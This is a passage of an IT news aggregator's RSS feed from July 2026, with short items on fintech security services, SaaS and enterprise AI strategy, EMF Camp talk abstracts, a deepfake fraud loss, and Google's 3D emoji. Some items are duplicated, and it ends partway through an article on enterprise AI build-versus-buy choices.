<p class="wp-block-paragraph">Live sport may be the most visible test of digital infrastructure, but it won’t be the last. As AI, personalisation and real-time experiences become the norm across industries, the ability to deliver reliably at scale will define far more than match day.</p>



<p class="wp-block-paragraph">To learn more, visit us <a href="https://www.tatacommunications.com/sports?utm_source=blog&amp;utm_medium=cio&amp;utm_campaign=mes%20fifa%20campaign">here</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Continuous Runtime Security Validation service aims to strengthen fintech cyber resilience]]></title>
<description><![CDATA[Fintech organisations across the UK and Ireland can now access a new service designed to provide ongoing assurance over production security following a strategic partnership between Critical Cloud and Tarian Labs. The Continuous Runtime Security Validation offering helps businesses continuously v...]]></description>
<link>https://tsecurity.de/de/3681201/it-security-nachrichten/new-continuous-runtime-security-validation-service-aims-to-strengthen-fintech-cyber-resilience/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681201/it-security-nachrichten/new-continuous-runtime-security-validation-service-aims-to-strengthen-fintech-cyber-resilience/</guid>
<pubDate>Mon, 20 Jul 2026 15:08:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Fintech organisations across the UK and Ireland can now access a new service designed to provide ongoing assurance over production security following a strategic partnership between Critical Cloud and Tarian Labs. The Continuous Runtime Security Validation offering helps businesses continuously verify that their security controls remain effective as cloud environments, applications and AI capabilities evolve. […]</p>
<p>The post <a href="https://www.itsecurityguru.org/2026/07/20/new-continuous-runtime-security-validation-service-aims-to-strengthen-fintech-cyber-resilience/">New Continuous Runtime Security Validation service aims to strengthen fintech cyber resilience</a> appeared first on <a href="https://www.itsecurityguru.org/">IT Security Guru</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Continuous Runtime Security Validation service aims to strengthen fintech cyber resilience]]></title>
<description><![CDATA[Fintech organisations across the UK and Ireland can now access a new service designed to provide ongoing assurance over production security following a strategic partnership between Critical Cloud and Tarian Labs. The Continuous Runtime Security Validation offering helps businesses continuously…
...]]></description>
<link>https://tsecurity.de/de/3681190/it-security-nachrichten/new-continuous-runtime-security-validation-service-aims-to-strengthen-fintech-cyber-resilience/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681190/it-security-nachrichten/new-continuous-runtime-security-validation-service-aims-to-strengthen-fintech-cyber-resilience/</guid>
<pubDate>Mon, 20 Jul 2026 15:08:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Fintech organisations across the UK and Ireland can now access a new service designed to provide ongoing assurance over production security following a strategic partnership between Critical Cloud and Tarian Labs. The Continuous Runtime Security Validation offering helps businesses continuously…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-continuous-runtime-security-validation-service-aims-to-strengthen-fintech-cyber-resilience/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-continuous-runtime-security-validation-service-aims-to-strengthen-fintech-cyber-resilience/">New Continuous Runtime Security Validation service aims to strengthen fintech cyber resilience</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA['The SaaS apocalypse is overrated': How Workday and other software providers plan to survive AI]]></title>
<description><![CDATA[Experts warn that an extinction event is coming for SaaS, thanks to AI disintermediation. Here's why some vendors remain skeptical.]]></description>
<link>https://tsecurity.de/de/3681105/it-nachrichten/the-saas-apocalypse-is-overrated-how-workday-and-other-software-providers-plan-to-survive-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681105/it-nachrichten/the-saas-apocalypse-is-overrated-how-workday-and-other-software-providers-plan-to-survive-ai/</guid>
<pubDate>Mon, 20 Jul 2026 14:32:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Experts warn that an extinction event is coming for SaaS, thanks to AI disintermediation. Here's why some vendors remain skeptical.]]></content:encoded>
</item>
<item>
<title><![CDATA[Everyone is now an AI company. But here’s the real challenge]]></title>
<description><![CDATA[Saying your fintech uses AI now means as much as saying you have a website.]]></description>
<link>https://tsecurity.de/de/3680796/it-nachrichten/everyone-is-now-an-ai-company-but-heres-the-real-challenge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680796/it-nachrichten/everyone-is-now-an-ai-company-but-heres-the-real-challenge/</guid>
<pubDate>Mon, 20 Jul 2026 12:03:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Saying your fintech uses AI now means as much as saying you have a website.]]></content:encoded>
</item>
<item>
<title><![CDATA["Don't set fire to the singer!"; Making a video jacket for a world concert tour. (emf2026)]]></title>
<description><![CDATA[A deep dive into the process of designing and implementing a fully custom-built wearable video screen, which was used on a 50-date international arena concert tour by a well-known musical artist in 2025 and 2026. 
Details of all aspects will be explored, from initial concept design with the artis...]]></description>
<link>https://tsecurity.de/de/3679810/it-security-video/dont-set-fire-to-the-singer-making-a-video-jacket-for-a-world-concert-tour-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679810/it-security-video/dont-set-fire-to-the-singer-making-a-video-jacket-for-a-world-concert-tour-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 20:02:07 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A deep dive into the process of designing and implementing a fully custom-built wearable video screen, which was used on a 50-date international arena concert tour by a well-known musical artist in 2025 and 2026. 
Details of all aspects will be explored, from initial concept design with the artist's creative and tour production teams, technical electronic and mechanical aspects, integration of the electronics into the costume, as well as the practicalities of building reliable &amp; robust hardware on a very short timescale. 
And of course the safety aspects of making a body-worn system capable of using over 250 watts of power. 

This was a commercial project, and is planned to be a joint presentation by myself (freelance electronics consultant) for the technical aspects, and my client (design studio) talking about production liaison, logistics and final hardware integration (sewing &amp; wiring!).

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/37-dont-set-fire-to-the-singer-making-a-video-jacket]]></content:encoded>
</item>
<item>
<title><![CDATA["Don't set fire to the singer!"; Making a video jacket for a world concert tour. (emf2026)]]></title>
<description><![CDATA[A deep dive into the process of designing and implementing a fully custom-built wearable video screen, which was used on a 50-date international arena concert tour by a well-known musical artist in 2025 and 2026. 
Details of all aspects will be explored, from initial concept design with the artis...]]></description>
<link>https://tsecurity.de/de/3679795/it-security-video/dont-set-fire-to-the-singer-making-a-video-jacket-for-a-world-concert-tour-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679795/it-security-video/dont-set-fire-to-the-singer-making-a-video-jacket-for-a-world-concert-tour-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 19:38:30 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A deep dive into the process of designing and implementing a fully custom-built wearable video screen, which was used on a 50-date international arena concert tour by a well-known musical artist in 2025 and 2026. 
Details of all aspects will be explored, from initial concept design with the artist's creative and tour production teams, technical electronic and mechanical aspects, integration of the electronics into the costume, as well as the practicalities of building reliable &amp; robust hardware on a very short timescale. 
And of course the safety aspects of making a body-worn system capable of using over 250 watts of power. 

This was a commercial project, and is planned to be a joint presentation by myself (freelance electronics consultant) for the technical aspects, and my client (design studio) talking about production liaison, logistics and final hardware integration (sewing &amp; wiring!).

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/37-dont-set-fire-to-the-singer-making-a-video-jacket]]></content:encoded>
</item>
<item>
<title><![CDATA[How To Debug A Human: An Engineer’s Guide To Emergency Medicine (emf2026)]]></title>
<description><![CDATA[What does designing software have in common with keeping people alive? More than you might think, probably. Decomposing software problems might take different knowledge than turning syndromes into diagnoses, but if you’ve got the skills to do one, you’re well on your way to the other. Join a comp...]]></description>
<link>https://tsecurity.de/de/3679794/it-security-video/how-to-debug-a-human-an-engineers-guide-to-emergency-medicine-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679794/it-security-video/how-to-debug-a-human-an-engineers-guide-to-emergency-medicine-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 19:38:28 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[What does designing software have in common with keeping people alive? More than you might think, probably. Decomposing software problems might take different knowledge than turning syndromes into diagnoses, but if you’ve got the skills to do one, you’re well on your way to the other. Join a computer scientist turned ambulance crew, awaiting results on their Masters in Paramedic Science, to learn how to take a software engineering approach to saving a life – from the roadside all the way to the bedside in A&amp;E. No prior knowledge required: you won’t get a qualification, or medical advice, but you will learn what a primary survey has to do with requirements-gathering, how to put a breakpoint in a patient’s heart without opening them up, and how screwing in a lightbulb can tell you what part of someone’s brain is broken.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/77-how-to-debug-a-human]]></content:encoded>
</item>
<item>
<title><![CDATA[How To Debug A Human: An Engineer’s Guide To Emergency Medicine (emf2026)]]></title>
<description><![CDATA[What does designing software have in common with keeping people alive? More than you might think, probably. Decomposing software problems might take different knowledge than turning syndromes into diagnoses, but if you’ve got the skills to do one, you’re well on your way to the other. Join a comp...]]></description>
<link>https://tsecurity.de/de/3679776/it-security-video/how-to-debug-a-human-an-engineers-guide-to-emergency-medicine-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679776/it-security-video/how-to-debug-a-human-an-engineers-guide-to-emergency-medicine-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 19:08:40 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[What does designing software have in common with keeping people alive? More than you might think, probably. Decomposing software problems might take different knowledge than turning syndromes into diagnoses, but if you’ve got the skills to do one, you’re well on your way to the other. Join a computer scientist turned ambulance crew, awaiting results on their Masters in Paramedic Science, to learn how to take a software engineering approach to saving a life – from the roadside all the way to the bedside in A&amp;E. No prior knowledge required: you won’t get a qualification, or medical advice, but you will learn what a primary survey has to do with requirements-gathering, how to put a breakpoint in a patient’s heart without opening them up, and how screwing in a lightbulb can tell you what part of someone’s brain is broken.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/77-how-to-debug-a-human]]></content:encoded>
</item>
<item>
<title><![CDATA[CNBC's Jim Cramer Says He Needs 'Cold Hard' Proof AI Is Paying Off]]></title>
<description><![CDATA[In a sign of our times, CNBC's Jim Cramer "said Wednesday that it's time for companies to prove artificial intelligence is paying off," reports CNBC:


"I need cold hard return facts," the "Mad Money" host said. "Or, I, too, will grow more skeptical than I am now...." While Cramer said he remains...]]></description>
<link>https://tsecurity.de/de/3678342/it-security-nachrichten/cnbcs-jim-cramer-says-he-needs-cold-hard-proof-ai-is-paying-off/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678342/it-security-nachrichten/cnbcs-jim-cramer-says-he-needs-cold-hard-proof-ai-is-paying-off/</guid>
<pubDate>Sat, 18 Jul 2026 19:53:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In a sign of our times, CNBC's Jim Cramer "said Wednesday that it's time for companies to prove artificial intelligence is paying off," reports CNBC:


"I need cold hard return facts," the "Mad Money" host said. "Or, I, too, will grow more skeptical than I am now...." While Cramer said he remains optimistic about the long-term opportunity, he argued the market needs more evidence that those investments are translating into measurable financial returns for customers. Cramer said one of his biggest concerns this earnings season is that companies adopting AI have largely failed to point to meaningful revenue gains or cost savings from the technology. "We're still early in the earnings season but already we are not hearing anything material about the use of AI," he said... 

While AI infrastructure companies continue to benefit from the spending boom, Cramer said the same cannot yet be said for many of the businesses buying the technology... Cramer said only a handful of companies, most notably fintech firm Block and web-security provider Cloudflare, have clearly attributed recent layoffs to AI adoption. Block did so in February, while Cloudflare's job cuts were disclosed in May. Plus, critics argue some companies may also cite AI as a buzzy excuse for cuts, leading to the creation of the term "AI washing." Ultimately, Cramer said that if more businesses do not begin reporting tangible returns, the AI skeptics will grow louder, with ramifications for the tech industry's big spenders.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=CNBC's+Jim+Cramer+Says+He+Needs+'Cold+Hard'+Proof+AI+Is+Paying+Off+%3A+https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F07%2F18%2F0812205%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F07%2F18%2F0812205%2Fcnbcs-jim-cramer-says-he-needs-cold-hard-proof-ai-is-paying-off%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://slashdot.org/story/26/07/18/0812205/cnbcs-jim-cramer-says-he-needs-cold-hard-proof-ai-is-paying-off?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Marvellous Mouse-powered Music box (emf2026)]]></title>
<description><![CDATA[It started when I stupidly promising my 8 year old that if the mouse brought in by my cat made through the night, we could keep it. It ended with a beautiful rendition of Toccata in D played solely by the rising star Mr Cheesey and the contraption I attached to his wheel. In this talk, I’ll cover...]]></description>
<link>https://tsecurity.de/de/3678322/it-security-video/the-marvellous-mouse-powered-music-box-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678322/it-security-video/the-marvellous-mouse-powered-music-box-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 19:22:32 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It started when I stupidly promising my 8 year old that if the mouse brought in by my cat made through the night, we could keep it. It ended with a beautiful rendition of Toccata in D played solely by the rising star Mr Cheesey and the contraption I attached to his wheel. In this talk, I’ll cover the ideas behind the plans, the designing and development of the music box wheel, the challenges of actually making it into a real machine (when some of there parts didn’t even exist) that actually worked and the creation of a YouTube platform showing Mr Cheesey (and his co-star Daphne) running around on their mouse wheel and turning a little hole punch music box covering all the (non-copyrighted) classics.

I'll also include structured diagrams explaining how the contraption works in case anyone has a similar idea they want to realise.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/210-the-marvellous-mouse-powered-music-box]]></content:encoded>
</item>
<item>
<title><![CDATA[The Marvellous Mouse-powered Music box (emf2026)]]></title>
<description><![CDATA[It started when I stupidly promising my 8 year old that if the mouse brought in by my cat made through the night, we could keep it. It ended with a beautiful rendition of Toccata in D played solely by the rising star Mr Cheesey and the contraption I attached to his wheel. In this talk, I’ll cover...]]></description>
<link>https://tsecurity.de/de/3678290/it-security-video/the-marvellous-mouse-powered-music-box-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678290/it-security-video/the-marvellous-mouse-powered-music-box-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 18:48:37 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It started when I stupidly promising my 8 year old that if the mouse brought in by my cat made through the night, we could keep it. It ended with a beautiful rendition of Toccata in D played solely by the rising star Mr Cheesey and the contraption I attached to his wheel. In this talk, I’ll cover the ideas behind the plans, the designing and development of the music box wheel, the challenges of actually making it into a real machine (when some of there parts didn’t even exist) that actually worked and the creation of a YouTube platform showing Mr Cheesey (and his co-star Daphne) running around on their mouse wheel and turning a little hole punch music box covering all the (non-copyrighted) classics.

I'll also include structured diagrams explaining how the contraption works in case anyone has a similar idea they want to realise.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/210-the-marvellous-mouse-powered-music-box]]></content:encoded>
</item>
<item>
<title><![CDATA[Google is open-sourcing its 3D emoji]]></title>
<description><![CDATA[Now, if you want to, you can use Google's 3D emoji in your own creations. The company shared some details about how it went about designing the little pictograms and why, as part of World Emoji Day on Friday. Things you might not necessarily worry about in a 2D illustration suddenly become very i...]]></description>
<link>https://tsecurity.de/de/3678286/it-nachrichten/google-is-open-sourcing-its-3d-emoji/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678286/it-nachrichten/google-is-open-sourcing-its-3d-emoji/</guid>
<pubDate>Sat, 18 Jul 2026 18:47:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Now, if you want to, you can use Google's 3D emoji in your own creations. The company shared some details about how it went about designing the little pictograms and why, as part of World Emoji Day on Friday. Things you might not necessarily worry about in a 2D illustration suddenly become very important when […]]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Improve Customer Retention in FinTech]]></title>
<description><![CDATA[A practical guide to combining pre-churn scoring with uplift modelling for smarter retention.
The post How to Improve Customer Retention in FinTech appeared first on Towards Data Science.]]></description>
<link>https://tsecurity.de/de/3678025/ai-nachrichten/how-to-improve-customer-retention-in-fintech/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678025/ai-nachrichten/how-to-improve-customer-retention-in-fintech/</guid>
<pubDate>Sat, 18 Jul 2026 15:03:26 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A practical guide to combining pre-churn scoring with uplift modelling for smarter retention.</p>
<p>The post <a href="https://towardsdatascience.com/how-to-improve-customer-retention-in-digital-banking/">How to Improve Customer Retention in FinTech</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I make things in schools, you can too (emf2026)]]></title>
<description><![CDATA[If you remember me from "I gave up investment banking to become a digital artist", you'll know that I've spent the last 17 years being an artist. Over that time I've worked in a lot of schools doing making activities: concrete relief casting in a nursery, constructing willow Fibonacci towers with...]]></description>
<link>https://tsecurity.de/de/3677987/it-security-video/i-make-things-in-schools-you-can-too-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677987/it-security-video/i-make-things-in-schools-you-can-too-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 14:33:11 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If you remember me from &quot;I gave up investment banking to become a digital artist&quot;, you'll know that I've spent the last 17 years being an artist. Over that time I've worked in a lot of schools doing making activities: concrete relief casting in a nursery, constructing willow Fibonacci towers with secondary maths students, designing paper mushrooms in a primary, writing haiku about water, organising giant multi-school lantern parades. My experience is that young people are increasingly struggling with the confidence and basic skills to make. Primary schools are becoming art-free zones, with limited resources and teachers struggling with their own confidence. It sounds bleak, but the exciting news is that you can make a huge difference in a young person's life by getting involved. I'm going to talk about what's going wrong and how we all might fix it.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/280-i-make-things-in-schools-you-can-too]]></content:encoded>
</item>
<item>
<title><![CDATA[Vibe-Coding im Unternehmen: Wann es sich lohnt, SaaS-Tools selbst zu bauen]]></title>
<description><![CDATA[Vibe-Coding macht Software-Eigenbau für Nicht-Entwickler realistisch. Für manche Unternehmen kippt damit gerade eine Grundannahme – und mit ihr die SaaS-Rechnung.weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3677944/it-nachrichten/vibe-coding-im-unternehmen-wann-es-sich-lohnt-saas-tools-selbst-zu-bauen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677944/it-nachrichten/vibe-coding-im-unternehmen-wann-es-sich-lohnt-saas-tools-selbst-zu-bauen/</guid>
<pubDate>Sat, 18 Jul 2026 14:02:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Vibe-Coding macht Software-Eigenbau für Nicht-Entwickler realistisch. Für manche Unternehmen kippt damit gerade eine Grundannahme – und mit ihr die SaaS-Rechnung.<a href="https://t3n.de/news/vibe-coding-im-unternehmen-1752172/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Deepfake Cyber Fraud Costs Capillary Technologies Over ₹32 Crore]]></title>
<description><![CDATA[  Capillary Technologies’ recent deepfake-enabled cyber fraud incident highlights how rapidly evolving AI tools are transforming from business enablers into serious security threats for global enterprises. The Bengaluru-based SaaS company disclosed that an overseas step-down subsidiary lost aroun...]]></description>
<link>https://tsecurity.de/de/3676669/it-security-nachrichten/deepfake-cyber-fraud-costs-capillary-technologies-over-32-crore/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676669/it-security-nachrichten/deepfake-cyber-fraud-costs-capillary-technologies-over-32-crore/</guid>
<pubDate>Fri, 17 Jul 2026 19:25:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Capillary Technologies’ recent deepfake-enabled cyber fraud incident highlights how rapidly evolving AI tools are transforming from business enablers into serious security threats for global enterprises. The Bengaluru-based SaaS company disclosed that an overseas step-down subsidiary lost around €3 million,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/deepfake-cyber-fraud-costs-capillary-technologies-over-%E2%82%B932-crore/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/deepfake-cyber-fraud-costs-capillary-technologies-over-%E2%82%B932-crore/">Deepfake Cyber Fraud Costs Capillary Technologies Over ₹32 Crore</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Designing emoji for the way we communicate today]]></title>
<description><![CDATA[On World Emoji Day, go behind the scenes of Noto 3D to learn how we redesigned thousands of emoji for modern communication.]]></description>
<link>https://tsecurity.de/de/3676333/it-nachrichten/designing-emoji-for-the-way-we-communicate-today/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676333/it-nachrichten/designing-emoji-for-the-way-we-communicate-today/</guid>
<pubDate>Fri, 17 Jul 2026 16:33:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/emoji_blog_social.max-600x600.format-webp.webp">On World Emoji Day, go behind the scenes of Noto 3D to learn how we redesigned thousands of emoji for modern communication.]]></content:encoded>
</item>
<item>
<title><![CDATA['The SaaS apocalypse is overrated': How Workday and other software provders plan to survive AI]]></title>
<description><![CDATA[Experts warn that an extinction event is coming for SaaS, thanks to AI disintermediation. Here's why some vendors remain skeptical.]]></description>
<link>https://tsecurity.de/de/3676123/hacking/the-saas-apocalypse-is-overrated-how-workday-and-other-software-provders-plan-to-survive-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676123/hacking/the-saas-apocalypse-is-overrated-how-workday-and-other-software-provders-plan-to-survive-ai/</guid>
<pubDate>Fri, 17 Jul 2026 15:06:10 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Experts warn that an extinction event is coming for SaaS, thanks to AI disintermediation. Here's why some vendors remain skeptical.]]></content:encoded>
</item>
<item>
<title><![CDATA[Top 10 Best Identity Threat Detection and Response (ITDR) Solutions in 2026]]></title>
<description><![CDATA[Identity has become the primary battleground of enterprise cybersecurity. Attackers increasingly bypass traditional defenses by stealing credentials, hijacking sessions, abusing privileged accounts, and exploiting misconfigurations across Active Directory, cloud platforms, SaaS applications, and ...]]></description>
<link>https://tsecurity.de/de/3675717/it-security-nachrichten/top-10-best-identity-threat-detection-and-response-itdr-solutions-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675717/it-security-nachrichten/top-10-best-identity-threat-detection-and-response-itdr-solutions-in-2026/</guid>
<pubDate>Fri, 17 Jul 2026 12:20:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Identity has become the primary battleground of enterprise cybersecurity. Attackers increasingly bypass traditional defenses by stealing credentials, hijacking sessions, abusing privileged accounts, and exploiting misconfigurations across Active Directory, cloud platforms, SaaS applications, and non-human identities. Microsoft reported more than 7,000…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/top-10-best-identity-threat-detection-and-response-itdr-solutions-in-2026/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/top-10-best-identity-threat-detection-and-response-itdr-solutions-in-2026/">Top 10 Best Identity Threat Detection and Response (ITDR) Solutions in 2026</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The build vs. buy dilemma at the heart of enterprise AI]]></title>
<description><![CDATA[For three decades, enterprise software has been a buy-it decision. Packaged software from SAP, Oracle and Salesforce covered roughly 80% of requirements at a fraction of the cost of building. The economics were obvious, and for traditional applications, they still are.



AI is introducing a wrin...]]></description>
<link>https://tsecurity.de/de/3675706/it-nachrichten/the-build-vs-buy-dilemma-at-the-heart-of-enterprise-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675706/it-nachrichten/the-build-vs-buy-dilemma-at-the-heart-of-enterprise-ai/</guid>
<pubDate>Fri, 17 Jul 2026 12:17:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For three decades, enterprise software has been a buy-it decision. Packaged software from SAP, Oracle and Salesforce covered roughly 80% of requirements at a fraction of the cost of building. The economics were obvious, and for traditional applications, they still are.</p>



<p class="wp-block-paragraph">AI is introducing a wrinkle that is forcing even the most committed enterprise software customers to rethink their options. AI is a layer that sits across your data, your processes, and your decisions. Where that layer runs and who controls it is an architecture question, and most of the enterprise community is still treating it as a procurement one.</p>



<p class="wp-block-paragraph">The appeal of vendor-embedded AI is clear: automated operational decisions, smarter supplier and merchandising choices, and friction-free workflows built into the systems enterprises already rely on. The catch is that these capabilities almost universally depend on your data living in the vendor’s cloud environment. For most large enterprises, it sits on-premises, in hyperscale cloud infrastructure they manage themselves, or in private data centers. That gap between where your data is and where your vendor’s AI assumes it should be creates a fundamental strategic fork in the road.</p>



<h2 class="wp-block-heading"><a></a>Build vs. buy is a category error</h2>



<p class="wp-block-paragraph">The framing I keep hearing is “build vs. buy your AI strategy.” It implies that some organizations are out there training foundation models from scratch. Nobody serious is doing that. The real choice sits across three distinct approaches, and conflating them leads to poor decisions:</p>



<ul class="wp-block-list">
<li><strong>Buy embedded. </strong>Use the AI capabilities your vendor ships natively inside their platform: the assistant baked into your ERP, your CRM, your HCM suite. Lowest integration cost, fastest time to value, tightest fit with the application data.</li>



<li><strong>Buy platform.</strong> Adopt the vendor’s AI infrastructure layer and build your own assistants and agents on top of it. More flexible, but you remain inside the vendor’s architectural boundary and subject to their governance model.</li>



<li><strong>Compose.</strong> Connect a third-party model (Claude, GPT, Gemini, an open-weight model running in your own environment) directly to your existing landscape. Maximum control, maximum integration burden, and full responsibility for what comes out the other end.</li>
</ul>



<p class="wp-block-paragraph">These are not equivalent options at different price points. They make different assumptions about where your data lives, who governs the AI, and how much architectural change you’ll absorb to get there. Vendor pitches sometimes blur the distinction on purpose. Enterprise leaders can’t afford to.</p>



<h2 class="wp-block-heading"><a></a>The vendor AI stack has an assumption baked in</h2>



<p class="wp-block-paragraph">Every embedded AI capability ships with an unstated architectural prerequisite: your data must be where the AI can see it, in the shape it expects, under the governance the vendor enforces.</p>



<p class="wp-block-paragraph">For organizations with clean, modern cloud estates, that is often a reasonable trade. For the long tail of large enterprises running heavily customized environments on private or hybrid infrastructure, that trade becomes a precondition, one you must meet before the AI conversation can even begin. Whether meeting it makes sense depends on your starting point, your sector’s regulatory posture, and your appetite for migration risk. None of those are uniform across organizations.</p>



<p class="wp-block-paragraph">That’s the part that gets glossed over in vendor keynotes. The AI demo on stage assumes a destination architecture the audience hasn’t necessarily reached yet. Large enterprise customers are carrying an unusually heavy technology burden right now. Many are simultaneously managing platform modernization programs that have been building for over a decade, alongside pressure to migrate to vendor-managed cloud infrastructure. Sitting above both is a boardroom-level directive to demonstrate meaningful AI progress fast. The vendor path to AI and the boardroom path to AI can diverge sharply, and enterprises need to make selective, strategic decisions about where to adopt AI first to maximize value and minimize risk.</p>



<h2 class="wp-block-heading"><a></a>Sovereignty isn’t a slogan, it’s an architecture constraint</h2>



<p class="wp-block-paragraph">The conversation about sovereignty has been hijacked by both sides. One camp treats every SaaS adoption as a sovereignty violation. The other dismisses every sovereignty concern as Luddite resistance. Neither is useful.</p>



<p class="wp-block-paragraph">What’s happening in real customer conversations – particularly in DACH, public sector, and financial services – is more specific. Organizations are drawing a distinction between running their applications in a vendor’s cloud (which is broadly fine, well understood, decades of precedent) and enriching their data and processes inside a vendor’s AI model (which has less precedent, is harder to reverse, and carries material implications for competitive position).</p>



